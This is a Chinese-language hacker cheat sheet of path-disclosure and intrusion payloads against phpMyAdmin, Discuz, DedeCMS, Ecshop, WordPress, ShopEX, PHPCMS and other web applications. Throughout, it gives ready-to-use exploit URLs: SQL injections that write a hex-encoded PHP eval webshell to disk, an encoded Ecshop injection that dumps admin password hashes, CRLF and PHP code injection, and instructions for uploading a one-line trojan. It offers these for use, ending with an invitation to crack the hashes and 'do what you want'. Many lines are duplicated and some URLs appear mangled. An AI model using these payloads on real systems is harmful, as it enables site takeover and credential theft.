辛苦整理的各类网站系统暴物理路径漏洞
Phpmyadmin暴路径:
phpmyadmin/libraries/select_lang.lib.php 得到物理路径
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpmyadmin/index.php?lang[]=1
phpMyAdmin/phpinfo.php
phpmyadmin/libraries/mcrypt.lib.php
phpmyadmin/libraries/export/xls.php
phpmyadmin/libraries/lect_lang.lib.php
phpmyadmin/libraries/select_lang.lib.php 得到物理路径
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpmyadmin/index.php?lang[]=1
phpMyAdmin/phpinfo.php
phpmyadmin/libraries/mcrypt.lib.php
phpmyadmin/libraries/export/xls.php
phpmyadmin/libraries/lect_lang.lib.php
Phpmyadmin最新重定向漏洞:
error.php?
error.php?
type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via
+characters+injection[br]It%27s+possible+use+some+special+tags+too
[br]Found+by+Tiger+Security+Tiger+Team+-+[a%
40http://www.safeclub.tk%40_self]This%20Is%20a%20Link[%2Fa]
DEDECMS通杀暴路径:
http://www.dedecms.com/plus/paycenter/alipay/return_url.php
http://www.dedecms.com/plus/paycenter/cbpayment/autoreceive.php
http://www.dedecms.com/plus/paycenter/nps/config_pay_nps.php
http://www.dedecms.com/plus/task/dede-maketimehtml.php
http://www.dedecms.com/plus/task/dede-optimize-table.php
http://www.dedecms.com/plus/task/dede-upcache.php
include/dialoguser/login.php
include/dialog/select_soft.php 暴后台
Discuz!5.2 5.1 4.1 4.0版本暴路径:
http://www.discuz.net/post.php?action=newthread&fid=32&extra[]=page%
http://www.discuz.net/post.php?action=newthread&fid=32&extra[]=page%
=1&extra=page%3D1#pid1453
Discuz7.2 manyou插件暴路径:7.1也可暴
/manyou/sources/notice.php
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
/manyou/sources/notice.php
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
写入SHELL(要开DUMPFILE)
http://www.0daynet.com/userapp.php?
http://www.0daynet.com/userapp.php?
script=notice&view=all&option=deluserapp&action=invite&hash=%27%
20union%20select%
20NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275
D293B3F3E,NULL,NULL,NULL,NULL%20into%20outfile%20%
27E://hackertest.php%27%23%A1%B1
注册一个用户后提交:
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=
{${phpinfo()}}
Discuz5.5暴路径:
wap/include/search.inc.php
wap/include/search.inc.php
如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?
script=notice&view=all&option=deluserapp&action=invite&hash='union
select
NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D2
93B3F3E,NULL,NULL,NULL,NULL into outfile
'C:/inetpub/wwwroot/shell.php'%23
Ecshop2.7.0暴管理员密码:
/search.php?
/search.php?
encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIE
JZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHB
hc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3Vz
ZXIjIjtzOjE6IjEiO319
Ecshop暴路径:
/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%
/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%
0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%
0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%
0A
织梦管理系统后台查找
时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。
这个时候 大家可以尝试下在地址后面 加上:
/include/dialog/select_media.php?f=form1.murl
Z-BLOG 1.8 Walle Build 100427 爆路径漏洞
admin/FCKeditor/editor/dialog/fck%
admin/FCKeditor/editor/dialog/fck%
5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php
WordPress老版本暴路径:
wp-content/plugins/akismet/akismet.php
wp-content/plugins/hello.php
wp-content/themes/default/404.php
wp-admin/themes
wp-content/themes/default
wp-settings.php
wp-content/plugins/akismet/akismet.php
wp-content/plugins/hello.php
wp-content/themes/default/404.php
wp-admin/themes
wp-content/themes/default
wp-settings.php
ShopEX4.8.4暴路径和下载数据库:
install/svinfo.php?phpinfo=true
home/cache/cachedata.php
shopadmin/index.php?ctl=sfile&act=getDB&p[0]=http://www.cnblogs.com/config/config.php
install/svinfo.php?phpinfo=true
home/cache/cachedata.php
shopadmin/index.php?ctl=sfile&act=getDB&p[0]=http://www.cnblogs.com/config/config.php
ecshop网店系统变种入侵
search.php?
search.php?
encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIE
JZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHB
hc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3Vz
ZXIjIjtzOjE6IjEiO319
encode=YToxOntzOjE4OiJzZWFyY2hfZW5jb2RlX3RpbWUiO2k6MTI3ODY2NzMwNTt9
大家注意后面的encode=,这里就加入我们的EXP变种代码:
YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb
2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3
JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjt
zOjE6IjEiO319
http://www.****.com/search.php?
http://www.****.com/search.php?
encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIE
JZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHB
hc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3Vz
ZXIjIjtzOjE6IjEiO319
打开后就可以暴出用户名的密码:
('椰子:75b747bbd05cb68a66b792f8c0c6e002"') union select
('椰子:75b747bbd05cb68a66b792f8c0c6e002"') union select
1#"','ggg:822fc056b87417e4bc68969c150ca5c6"') union select 1#"')
后台路径:/admin/index.php
后台路径:/admin/index.php
密码是经过MD5加密的,接下来的事我就不用多废话了.....
vBulletin 3.6.4 暴路径:
http://192.168.240.129/forum/admincp/index.php?do=phpinfo
http://192.168.240.129/forum/admincp/index.php?do=phpinfo
U-MAIL后台拿shell:
登陆后在 信纸管理 中添加信纸,上传一句话PHP马文件预览图即可得到地址。
PHPCMS2008 SP4暴路径:先注册一个用户
/member/register.php 登陆用户后提交即可爆出物理路径:
/corpandresize/process.php?pic=../images/logo.gif
后台登陆:/admin.php
/member/register.php 登陆用户后提交即可爆出物理路径:
/corpandresize/process.php?pic=../images/logo.gif
后台登陆:/admin.php
shopv8 v10.84 商城系统注入漏洞
在注入点:http://127.0.0.1:99/list.asp?id=322,直接用注入中转器生成个
页面,爆用户名和密码,如图:
注入语句:
20select%
201,2,3,4,5,6,7,8,9,10,11,12,13,username,password,16,17,18,19,20,21,2
2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4
5,46,47,48,49,50,51,52,53%20from%20admin
在Md5查询的网站查出明文密码,然后进后台,做你要做的。
Sun GlassFish Enterprise Server v2.1.1
关键字: Sun GlassFish Enterprise Server v2.1.1 /editor/fckeditor/editor/
用谷歌搜索这个!就会看到目录!
这个是一个编辑器漏洞。
Sun GlassFish Enterprise Server v2.1.1
关键字: Sun GlassFish Enterprise Server v2.1.1 /editor/fckeditor/editor/
用谷歌搜索这个!就会看到目录!
这个是一个编辑器漏洞。
